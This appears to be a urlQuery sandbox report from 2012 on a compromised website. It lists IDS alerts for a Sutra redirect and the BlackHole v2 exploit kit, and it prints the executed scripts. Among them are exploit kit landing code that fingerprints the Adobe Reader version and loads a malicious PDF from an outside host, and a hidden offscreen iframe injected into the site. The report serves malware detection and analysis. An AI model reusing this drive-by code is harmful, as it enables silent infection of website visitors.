Overview

URLhttp://firebrandal.com/
IP173.201.238.128
ASNAS26496 GoDaddy.com, LLC
Location United States
Report completed2012-11-05 18:01:50 CET
StatusLoading report..
urlQuery Alerts Detected SutraTDS URL pattern
Detected live BlackHole v2.0 exploit kit


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-05 18:00:30 173.201.238.128 urlQuery Client1ET SHELLCODE Excessive Use of HeapLib Objects Likely Malicious Heap Spray Attempt
2012-11-05 18:00:38 urlQuery Client Internal IP2ETPRO CURRENT_EVENTS DNS Query to a *.br.ms Free Domain
2012-11-05 18:00:40 173.194.69.156 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-05 18:00:41 208.89.210.254 urlQuery Client2ET CURRENT_EVENTS TDS Sutra - redirect received
2012-11-05 18:00:41 urlQuery Client 62.109.7.1061ET CURRENT_EVENTS Blackhole 2 Landing Page
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-05 18:00:41 62.109.7.106 urlQuery Client1EXPLOIT-KIT Blackholev2 landing page received - specific structure
2012-11-05 18:00:41 62.109.7.106 urlQuery Client1INDICATOR-OBFUSCATION Javascript obfuscation - fromCharCode
2012-11-05 18:00:43 62.109.7.106 urlQuery Client3FILE-PDF Overly large CreationDate within a pdf - likely malicious
2012-11-05 18:00:43 62.109.7.106 urlQuery Client1FILE-PDF EmbeddedFile contained within a PDF


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 173.201.238.128

Date Alerts / IDS URL IP
2013-02-05 04:40:120 / 5http://tgun.tv/embed/sein.php173.201.238.128
2013-01-23 00:23:220 / 0http://www.myfcph.org/173.201.238.128
2012-12-26 17:31:421 / 1http://www.colambia.co/on/demandware.store/Sites-Columbia_US-Site/default/Default-Sta (...)173.201.238.128
2012-12-26 17:31:311 / 1http://colambia.co/173.201.238.128
2012-12-22 11:15:090 / 0http://www.marinospecognaquebec.com/173.201.238.128
2012-12-22 09:58:550 / 0http://marinospecognaquebec.com173.201.238.128

Last 6 reports on ASN: AS26496 GoDaddy.com, LLC

Date Alerts / IDS URL IP
2013-02-15 18:08:230 / 3http://mkvrpknidkurcrftiqsfjqdxbn.com/pQgoT3VXzROIdj0xLjEmaWQ9MjQzNDMyMDI2NiZhaWQ9MzA0NDMmc2lkP (...)50.62.12.103
2013-02-15 18:07:380 / 3http://mkvrpknidkurcrftiqsfjqdxbn.com/TmfNJ5RRADhwdj0xLjEmaWQ9MjY3NTQzMTYwNSZhaWQ9MzA0NDMmc2lkP (...)50.62.12.103
2013-02-15 18:06:470 / 3http://mkvrpknidkurcrftiqsfjqdxbn.com/Gff2J1VVoiKIdj0xLjEmaWQ9NDA5ODM2NTQxNyZhaWQ9MzA1MDAmc2lkP (...)50.62.12.103
2013-02-15 18:06:290 / 1http://mkvrpknidkurcrftiqsfjqdxbn.com/ygQnT1XRxwhTdj0xLjEmaWQ9MjYyMjE3MTc5MyZhaWQ9NTEwNTMmc2lkP (...)50.62.12.103
2013-02-15 18:06:270 / 3http://www.bksalesinc.com68.178.166.13
2013-02-15 18:05:480 / 3http://mkvrpknidkurcrftiqsfjqdxbn.com/rQg8W1RVEOLEdj0xLjEmaWQ9MTU2NjE4NjIzNSZhaWQ9MzA0NDMmc2lkP (...)50.62.12.103

Last 4 reports on domain: firebrandal.com

Date Alerts / IDS URL IP
2013-01-09 18:10:320 / 1http://firebrandal.com/108.162.198.175
2012-12-13 13:56:420 / 2http://firebrandal.com/173.201.238.128
2012-12-12 16:26:510 / 2http://firebrandal.com/173.201.238.128
2012-11-21 21:19:220 / 2http://firebrandal.com173.201.238.128



JavaScript

Executed Scripts (139)


Executed Evals (2)

#1 JavaScript::Eval (size: 8, repeated: 1)

parseInt

#2 JavaScript::Eval (size: 12304, repeated: 1) - Alert detect on script (Severity: 1)

try {
    var PluginDetect = {
        version: "0.7.8",
        name: "PluginDetect",
        handler: function(c, b, a) {
            return function() {
                c(b, a)
            }
        },
        isDefined: function(b) {
            return typeof b != "undefined"
        },
        isArray: function(b) {
            return (/array/i).test(Object.prototype.toString.call(b))
        },
        isFunc: function(b) {
            return typeof b == "function"
        },
        isString: function(b) {
            return typeof b == "string"
        },
        isNum: function(b) {
            return typeof b == "number"
        },
        isStrNum: function(b) {
            return (typeof b == "string" && (/\d/).test(b))
        },
        getNumRegx: /[\d][\d\.\_,-]*/,
        splitNumRegx: /[\.\_,-]/g,
        getNum: function(b, c) {
            var d = this,
                a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
            return a ? a[0] : null
        },
        compareNums: function(h, f, d) {
            var e = this,
                c, b, a, g = parseInt;
            if (e.isStrNum(h) && e.isStrNum(f)) {
                if (e.isDefined(d) && d.compareNums) {
                    return d.compareNums(h, f)
                }
                c = h.split(e.splitNumRegx);
                b = f.split(e.splitNumRegx);
                for (a = 0; a < Math.min(c.length, b.length); a++) {
                    if (g(c[a], 10) > g(b[a], 10)) {
                        return 1
                    }
                    if (g(c[a], 10) < g(b[a], 10)) {
                        return -1
                    }
                }
            }
            return 0
        },
        formatNum: function(b, c) {
            var d = this,
                a, e;
            if (!d.isStrNum(b)) {
                return null
            }
            if (!d.isNum(c)) {
                c = 4
            }
            c--;
            e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
            for (a = 0; a < 4; a++) {
                if (/^(0+)(.+)$/.test(e[a])) {
                    e[a] = RegExp.$2
                }
                if (a > c || !(/\d/).test(e[a])) {
                    e[a] = "0"
                }
            }
            return e.slice(0, 4).join(",")
        },
        $$hasMimeType: function(a) {
            return function(c) {
                if (!a.isIE && c) {
                    var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
                    for (b = 0; b < d.length; b++) {
                        if (a.isString(d[b]) && /[^\s]/.test(d[b])) {
                            f = navigator.mimeTypes[d[b]];
                            e = f ? f.enabledPlugin : 0;
                            if (e && (e.name || e.description)) {
                                return f
                            }
                        }
                    }
                }
                return null
            }
        },
        findNavPlugin: function(l, e, c) {
            var j = this,
                h = new RegExp(l, "i"),
                d = (!j.isDefined(e) || e) ? /\d/ : 0,
                k = c ? new RegExp(c, "i") : 0,
                a = navigator.plugins,
                g = "",
                f, b, m;
            for (f = 0; f < a.length; f++) {
                m = a[f].description || g;
                b = a[f].name || g;
                if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
                    if (!k || !(k.test(m) || k.test(b))) {
                        return a[f]
                    }
                }
            }
            return null
        },
        getMimeEnabledPlugin: function(k, m, c) {
            var e = this,
                f, b = new RegExp(m, "i"),
                h = "",
                g = c ? new RegExp(c, "i") : 0,
                a, l, d, j = e.isString(k) ? [k] : k;
            for (d = 0; d < j.length; d++) {
                if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)) {
                    l = f.description || h;
                    a = f.name || h;
                    if (b.test(l) || b.test(a)) {
                        if (!g || !(g.test(l) || g.test(a))) {
                            return f
                        }
                    }
                }
            }
            return 0
        },
        getPluginFileVersion: function(f, b) {
            var h = this,
                e, d, g, a, c = -1;
            if (h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
                return b
            }
            if (!b) {
                return e
            }
            e = h.formatNum(e);
            b = h.formatNum(b);
            d = b.split(h.splitNumRegx);
            g = e.split(h.splitNumRegx);
            for (a = 0; a < d.length; a++) {
                if (c > -1 && a > c && d[a] != "0") {
                    return b
                }
                if (g[a] != d[a]) {
                    if (c == -1) {
                        c = a
                    }
                    if (d[a] != "0") {
                        return b
                    }
                }
            }
            return e
        },
        AXO: window.ActiveXObject,
        getAXO: function(a) {
            var f = null,
                d, b = this,
                c = {};
            try {
                f = new b.AXO(a)
            } catch (d) {}
            return f
        },
        convertFuncs: function(f) {
            var a, g, d, b = /^[\$][\$]/,
                c = this;
            for (a in f) {
                if (b.test(a)) {
                    try {
                        g = a.slice(2);
                        if (g.length > 0 && !f[g]) {
                            f[g] = f[a](f);
                            delete f[a]
                        }
                    } catch (d) {}
                }
            }
        },
        initObj: function(e, b, d) {
            var a, c;
            if (e) {
                if (e[b[0]] == 1 || d) {
                    for (a = 0; a < b.length; a = a + 2) {
                        e[b[a]] = b[a + 1]
                    }
                }
                for (a in e) {
                    c = e[a];
                    if (c && c[b[0]] == 1) {
                        this.initObj(c, b)
                    }
                }
            }
        },
        initScript: function() {
            var c = this,
                a = navigator,
                e = "/",
                f, i = a.userAgent || "",
                g = a.vendor || "",
                b = a.platform || "",
                h = a.product || "";
            c.initObj(c, ["$", c]);
            for (f in c.Plugins) {
                if (c.Plugins[f]) {
                    c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
                }
            };
            c.OS = 100;
            if (b) {
                var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "", 100];
                for (f = d.length - 2; f >= 0; f = f - 2) {
                    if (d[f] && new RegExp(d[f], "i").test(b)) {
                        c.OS = d[f + 1];
                        break
                    }
                }
            }
            c.convertFuncs(c);
            c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0] || document.body || null);
            c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
            c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
            c.ActiveXEnabled = false;
            if (c.isIE) {
                var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
                for (f = 0; f < j.length; f++) {
                    if (c.getAXO(j[f])) {
                        c.ActiveXEnabled = true;
                        break
                    }
                }
            }
            c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
            c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
            c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
            c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
            c.isSafari = ((/Apple/i).test(g) || (!g && !c.isChrome)) && (/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
            c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(RegExp.$1) : null;
            c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
            c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null;
            c.addWinEvent("load", c.handler(c.runWLfuncs, c))
        },
        init: function(d) {
            var c = this,
                b, d, a = {
                    status: -3,
                    plugin: 0
                };
            if (!c.isString(d)) {
                return a
            }
            if (d.length == 1) {
                c.getVersionDelimiter = d;
                return a
            }
            d = d.toLowerCase().replace(/\s/g, "");
            b = c.Plugins[d];
            if (!b || !b.getVersion) {
                return a
            }
            a.plugin = b;
            if (!c.isDefined(b.installed)) {
                b.installed = null;
                b.version = null;
                b.version0 = null;
                b.getVersionDone = null;
                b.pluginName = d
            }
            c.garbage = false;
            if (c.isIE && !c.ActiveXEnabled && d !== "java") {
                a.status = -2;
                return a
            }
            a.status = 1;
            return a
        },
        fPush: function(b, a) {
            var c = this;
            if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))) {
                a.push(b)
            }
        },
        callArray: function(b) {
            var c = this,
                a;
            if (c.isArray(b)) {
                for (a = 0; a < b.length; a++) {
                    if (b[a] === null) {
                        return
                    }
                    c.call(b[a]);
                    b[a] = null
                }
            }
        },
        call: function(c) {
            var b = this,
                a = b.isArray(c) ? c.length : -1;
            if (a > 0 && b.isFunc(c[0])) {
                c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
            } else {
                if (b.isFunc(c)) {
                    c(b)
                }
            }
        },
        getVersionDelimiter: ",",
        $$getVersion: function(a) {
            return function(g, d, c) {
                var e = a.init(g),
                    f, b, h = {};
                if (e.status < 0) {
                    return null
                };
                f = e.plugin;
                if (f.getVersionDone != 1) {
                    f.getVersion(null, d, c);
                    if (f.getVersionDone === null) {
                        f.getVersionDone = 1
                    }
                }
                a.cleanup();
                b = (f.version || f.version0);
                b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
                return b
            }
        },
        cleanup: function() {},
        addWinEvent: function(d, c) {
            var e = this,
                a = window,
                b;
            if (e.isFunc(c)) {
                if (a.addEventListener) {
                    a.addEventListener(d, c, false)
                } else {
                    if (a.attachEvent) {
                        a.attachEvent("on" + d, c)
                    } else {
                        b = a["on" + d];
                        a["on" + d] = e.winHandler(c, b)
                    }
                }
            }
        },
        winHandler: function(d, c) {
            return function() {
                d();
                if (typeof c == "function") {
                    c()
                }
            }
        },
        WLfuncs0: [],
        WLfuncs: [],
        runWLfuncs: function(a) {
            var b = {};
            a.winLoaded = true;
            a.callArray(a.WLfuncs0);
            a.callArray(a.WLfuncs);
            if (a.onDoneEmptyDiv) {
                a.onDoneEmptyDiv()
            }
        },
        winLoaded: false,
        $$onWindowLoaded: function(a) {
            return function(b) {
                if (a.winLoaded) {
                    a.call(b)
                } else {
                    a.fPush(b, a.WLfuncs)
                }
            }
        },
        div: null,
        divID: "plugindetect",
        divWidth: 50,
        pluginSize: 1,
        emptyDiv: function() {
            var d = this,
                b, h, c, a, f, g;
            if (d.div && d.div.childNodes) {
                for (b = d.div.childNodes.length - 1; b >= 0; b--) {
                    c = d.div.childNodes[b];
                    if (c && c.childNodes) {
                        for (h = c.childNodes.length - 1; h >= 0; h--) {
                            g = c.childNodes[h];
                            try {
                                c.removeChild(g)
                            } catch (f) {}
                        }
                    }
                    if (c) {
                        try {
                            d.div.removeChild(c)
                        } catch (f) {}
                    }
                }
            }
            if (!d.div) {
                a = document.getElementById(d.divID);
                if (a) {
                    d.div = a
                }
            }
            if (d.div && d.div.parentNode) {
                try {
                    d.div.parentNode.removeChild(d.div)
                } catch (f) {}
                d.div = null
            }
        },
        DONEfuncs: [],
        onDoneEmptyDiv: function() {
            var c = this,
                a, b;
            if (!c.winLoaded) {
                return
            }
            if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
                return
            }
            for (a in c) {
                b = c[a];
                if (b && b.funcs) {
                    if (b.OTF == 3) {
                        return
                    }
                    if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
                        return
                    }
                }
            }
            for (a = 0; a < c.DONEfuncs.length; a++) {
                c.callArray(c.DONEfuncs)
            }
            c.emptyDiv()
        },
        getWidth: function(c) {
            if (c) {
                var a = c.scrollWidth || c.offsetWidth,
                    b = this;
                if (b.isNum(a)) {
                    return a
                }
            }
            return -1
        },
        getTagStatus: function(m, g, a, b) {
            var c = this,
                f, k = m.span,
                l = c.getWidth(k),
                h = a.span,
                j = c.getWidth(h),
                d = g.span,
                i = c.getWidth(d);
            if (!k || !h || !d || !c.getDOMobj(m)) {
                return -2
            }
            if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1) {
                return 0
            }
            if (l >= i) {
                return -1
            }
            try {
                if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
                    if (!m.winLoaded && c.winLoaded) {
                        return 1
                    }
                    if (m.winLoaded && c.isNum(b)) {
                        if (!c.isNum(m.count)) {
                            m.count = b
                        }
                        if (b - m.count >= 10) {
                            return 1
                        }
                    }
                }
            } catch (f) {}
            return 0
        },
        getDOMobj: function(g, a) {
            var f, d = this,
                c = g ? g.span : 0,
                b = c && c.firstChild ? 1 : 0;
            try {
                if (b && a) {
                    d.div.focus()
                }
            } catch (f) {}
            return b ? c.firstChild : null
        },
        setStyle: function(b, g) {
            var f = b.style,
                a, d, c = this;
            if (f && g) {
                for (a = 0; a < g.length; a = a + 2) {
                    try {
                        f[g[a]] = g[a + 1]
                    } catch (d) {}
                }
            }
        },
        insertDivInBody: function(a, i) {
            var h, f = this,
                b = "pd33993399",
                d = null,
                j = i ? window.top.document : window.document,
                c = "<",
                g = (j.getElementsByTagName("body")[0] || j.body);
            if (!g) {
                try {
                    j.write(c + 'div id="' + b + '">o' + c + "/div>");
                    d = j.getElementById(b)
                } catch (h) {}
            }
            g = (j.getElementsByTagName("body")[0] || j.body);
            if (g) {
                if (g.firstChild && f.isDefined(g.insertBefore)) {
                    g.insertBefore(a, g.firstChild)
                } else {
                    g.appendChild(a)
                }
                if (d) {
                    g.removeChild(d)
                }
            } else {}
        },
        insertHTML: function(g, b, h, a, l) {
            var m, n = document,
                k = this,
                q, p = n.createElement("span"),
                o, j, f = "<";
            var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
            var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
            if (!k.isDefined(a)) {
                a = ""
            }
            if (k.isString(g) && (/[^\s]/).test(g)) {
                g = g.toLowerCase().replace(/\s/g, "");
                q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
                q += 'style="' + i + 'display:inline;" ';
                for (o = 0; o < b.length; o = o + 2) {
                    if (/[^\s]/.test(b[o + 1])) {
                        q += b[o] + '="' + b[o + 1] + '" '
                    }
                }
                q += ">";
                for (o = 0; o < h.length; o = o + 2) {
                    if (/[^\s]/.test(h[o + 1])) {
                        q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
                    }
                }
                q += a + f + "/" + g + ">"
            } else {
                q = a
            }
            if (!k.div) {
                j = n.getElementById(k.divID);
                if (j) {
                    k.div = j
                } else {
                    k.div = n.createElement("div");
                    k.div.id = k.divID
                }
                k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize + 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
                if (!j) {
                    k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
                    k.insertDivInBody(k.div)
                }
            }
            if (k.div && k.div.parentNode) {
                k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
                try {
                    p.innerHTML = q
                } catch (m) {};
                try {
                    k.div.appendChild(p)
                } catch (m) {};
                return {
                    span: p,
                    winLoaded: k.winLoaded,
                    tagName: g,
                    outerHTML: q
                }
            }
            return {
                span: null,
                winLoaded: k.winLoaded,
                tagName: "",
                outerHTML: q
            }
        },
        Plugins: {
            adobereader: {
                mimeType: "application/pdf",
                navPluginObj: null,
                progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
                classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
                INSTALLED: {},
                pluginHasMimeType: function(d, c, f) {
                    var b = this,
                        e = b.$,
                        a;
                    for (a in d) {
                        if (d[a] && d[a].type && d[a].type == c) {
                            return 1
                        }
                    }
                    if (e.getMimeEnabledPlugin(c, f)) {
                        return 1
                    }
                    return 0
                },
                getVersion: function(l, j) {
                    var g = this,
                        d = g.$,
                        i, f, m, n, b = null,
                        h = null,
                        k = g.mimeType,
                        a, c;
                    if (d.isString(j)) {
                        j = j.replace(/\s/g, "");
                        if (j) {
                            k = j
                        }
                    } else {
                        j = null
                    }
                    if (d.isDefined(g.INSTALLED[k])) {
                        g.installed = g.INSTALLED[k];
                        return
                    }
                    if (!d.isIE) {
                        a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
                        if (g.getVersionDone !== 0) {
                            g.getVersionDone = 0;
                            b = d.getMimeEnabledPlugin(g.mimeType, a);
                            if (!j) {
                                n = b
                            }
                            if (!b && d.hasMimeType(g.mimeType)) {
                                b = d.findNavPlugin(a, 0)
                            }
                            if (b) {
                                g.navPluginObj = b;
                                h = d.getNum(b.description) || d.getNum(b.name);
                                h = d.getPluginFileVersion(b, h);
                                if (!h && d.OS == 1) {
                                    if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)) {
                                        h = "9"
                                    } else {
                                        if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)) {
                                            h = "8"
                                        }
                                    }
                                }
                            }
                        } else {
                            h = g.version
                        }
                        if (!d.isDefined(n)) {
                            n = d.getMimeEnabledPlugin(k, a)
                        }
                        g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
                    } else {
                        b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
                        c = /=\s*([\d\.]+)/g;
                        try {
                            f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions();
                            for (m = 0; m < 5; m++) {
                                if (c.test(f) && (!h || RegExp.$1 > h)) {
                                    h = RegExp.$1
                                }
                            }
                        } catch (i) {}
                        g.installed = h ? 1 : (b ? 0 : -1)
                    }
                    if (!g.version) {
                        g.version = d.formatNum(h)
                    }
                    g.INSTALLED[k] = g.installed
                }
            },
            zz: 0
        }
    };
    PluginDetect.initScript();
    PluginDetect.getVersion(".");
    pdfver = PluginDetect.getVersion("AdobeReader");
} catch (e) {}
if (typeof pdfver == 'string') {
    pdfver = pdfver.split('.')
} else {
    pdfver = [0, 0, 0, 0]
}
function x(s) {
    d = [];
    for (i = 0; i < s.length; i++) {
        k = (s.charCodeAt(i) - 46).toString(16);
        if (k.length == 1) k = "0" + k;
        d.push(k);
    };
    return d.join("");
}
end_redirect = function() {};
window.onbeforeunload = function() {
    return "";
};
try {
    show_pdf2 = function(src) {
        d = document;
        cr = "create";
        cr += "Element";
        var p = d[cr]('object');
        p.setAttribute('type', 'application/pdf');
        p.setAttribute('data', src);
        p.setAttribute('width', 1);
        p.setAttribute('height', 1);
        document.body.appendChild(p)
    };
    show_pdf2("http://khpjornvbw.net/links/majority_last_submitting.php?lwx=" + x("bdf91") + "&jyonhcf=" + x("x") + "&ihy=0a340b37043808020237&yfjj=" + x(pdfver.join(".")));
} catch (errno) {}
document.write('');
setTimeout(end_redirect, 60000);

Executed Writes (19)

#1 JavaScript::Write (size: 0, repeated: 1)

#2 JavaScript::Write (size: 463, repeated: 1)

<!doctype html><html><body><script>google_ad_client="ca-pub-3256725667777155";google_ad_height=90;google_ad_slot="0998046247";google_ad_width=728;google_show_ads_impl=true;google_unique_id=1;google_async_iframe_id="aswift_0";google_ad_unit_key="353781055";google_start_time=1352134836387;google_expand_experiment="none";google_bpp=7;</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20121023/r20120730/show_ads_impl.js"></script></body></html>

#3 JavaScript::Write (size: 465, repeated: 1)

<!doctype html><html><body><script>google_ad_client="ca-pub-3515913239267445";google_ad_height=250;google_ad_slot="6323475569";google_ad_width=300;google_show_ads_impl=true;google_unique_id=2;google_async_iframe_id="aswift_1";google_ad_unit_key="3370988103";google_start_time=1352134837476;google_expand_experiment="none";google_bpp=4;</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20121023/r20120730/show_ads_impl.js"></script></body></html>

#4 JavaScript::Write (size: 54, repeated: 1)

<!doctype html><html><head></head><body></body></html>

#5 JavaScript::Write (size: 397, repeated: 1)

<div id='beacon_14171' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://vap5iad3.lijit.com/www/delivery/lg.php?bannerid=14171&amp;campaignid=232&amp;cids=232&amp;bids=14171&amp;zoneid=153334&amp;tid=153334_13521348357770db92221bcae&amp;loc=http%3A%2F%2Ffirebrandal.com%2F&amp;cb=1cce5bf923' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>

#6 JavaScript::Write (size: 816, repeated: 1)

<iframe allowtransparency=true frameborder=0 height=250 hspace=0 id=google_ads_frame2 marginheight=0 marginwidth=0 name=google_ads_frame2 scrolling=no src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3515913239267445&output=html&h=250&slotname=6323475569&w=300&lmt=1352134830&flash=10.0.45&url=http%3A%2F%2Ffirebrandal.com%2F&dt=1352134837476&bpp=4&shv=r20121023&jsv=r20110914&prev_slotnames=0998046247&correlator=1352134836584&frm=20&adk=3370988103&ga_vid=699239837.1352134837&ga_sid=1352134837&ga_hid=1329589676&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=helvetica&dfs=13&adx=770&ady=794&biw=1159&bih=778&oid=3&fu=0&ifi=2&dtd=89&xpc=N0GGNbLLEj&p=http%3A//firebrandal.com" style="left:0;position:absolute;top:0" vspace=0 width=300></iframe>

#7 JavaScript::Write (size: 785, repeated: 1)

<iframe allowtransparency=true frameborder=0 height=90 hspace=0 id=google_ads_frame1 marginheight=0 marginwidth=0 name=google_ads_frame1 scrolling=no src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3256725667777155&output=html&h=90&slotname=0998046247&w=728&lmt=1352134830&flash=10.0.45&url=http%3A%2F%2Ffirebrandal.com%2F&dt=1352134836387&bpp=7&shv=r20121023&jsv=r20110914&correlator=1352134836584&frm=20&adk=353781055&ga_vid=699239837.1352134837&ga_sid=1352134837&ga_hid=1329589676&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=tahoma&dfs=12&adx=216&ady=264&biw=1159&bih=778&oid=3&fu=0&ifi=1&dtd=945&xpc=qkZdIfVrBI&p=http%3A//firebrandal.com" style="left:0;position:absolute;top:0" vspace=0 width=728></iframe>

#8 JavaScript::Write (size: 201, repeated: 1)

<iframe src="http://cleanupyoprincess.br.ms:81/rem5.html" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" style="width:31px;position:absolute;left:-3773px;"></iframe>

#9 JavaScript::Write (size: 818, repeated: 1)

<ins style="display:inline-table;border:none;height:250px;margin:0;padding:0;position:relative;visibility:visible;width:300px"><ins id="aswift_1_anchor" style="display:block;border:none;height:250px;margin:0;padding:0;position:relative;visibility:visible;width:300px"><iframe allowtransparency="true" frameborder="0" height="250" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){i+='.call';setTimeout(h,0)}else if(h.match){i+='.nav';w.location.replace(h)}s.log&amp;&amp;s.log.push(i)}" scrolling="no" vspace="0" width="300" id=aswift_1 name=aswift_1 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#10 JavaScript::Write (size: 815, repeated: 1)

<ins style="display:inline-table;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:728px"><ins id="aswift_0_anchor" style="display:block;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:728px"><iframe allowtransparency="true" frameborder="0" height="90" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){i+='.call';setTimeout(h,0)}else if(h.match){i+='.nav';w.location.replace(h)}s.log&amp;&amp;s.log.push(i)}" scrolling="no" vspace="0" width="728" id=aswift_0 name=aswift_0 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#11 JavaScript::Write (size: 86, repeated: 2)

<script src="http://pagead2.googlesyndication.com/pagead/expansion_embed.js"></script>

#12 JavaScript::Write (size: 84, repeated: 1)

<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>

#13 JavaScript::Write (size: 90, repeated: 1)

<script type="text/javascript" src="//Template/south_africa/jquery.scrollTo.php"></script>

#14 JavaScript::Write (size: 83, repeated: 1)

<script type="text/javascript" src="//wp-content/themes/supersleight.php"></script>

#15 JavaScript::Write (size: 235, repeated: 1)

<script type="text/javascript" src="http://delivery.switchadhub.com/adserver/www/delivery/ajs.php?zoneid=6110&amp;cb=2301092746&amp;charset=UTF-8&amp;loc=http%3A//firebrandal.com/&amp;tzo=-60&amp;target=_blank&bw=1176&bh=778"></script>

#16 JavaScript::Write (size: 1940, repeated: 1)

<script type="text/javascript">
lwp_parent_ad_id=14171;
if(typeof ljt_beacon_vals==="undefined"){ljt_beacon_vals=[];}
ljt_beacon_vals[153334]="bannerid=14171&amp;campaignid=232&amp;cids=232&amp;bids=14171";
if((typeof(LJT_bCInfo)!=="undefined")&&(typeof(LJT_bCInfo[153334])!=="undefined")){ljt_beacon_vals[153334]+=LJT_bCInfo[153334];}  
</script><script type="text/javascript"><!--
google_ad_client = "ca-pub-3256725667777155";
/* 728x90, created 10/1/09 */
google_ad_slot = "0998046247";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
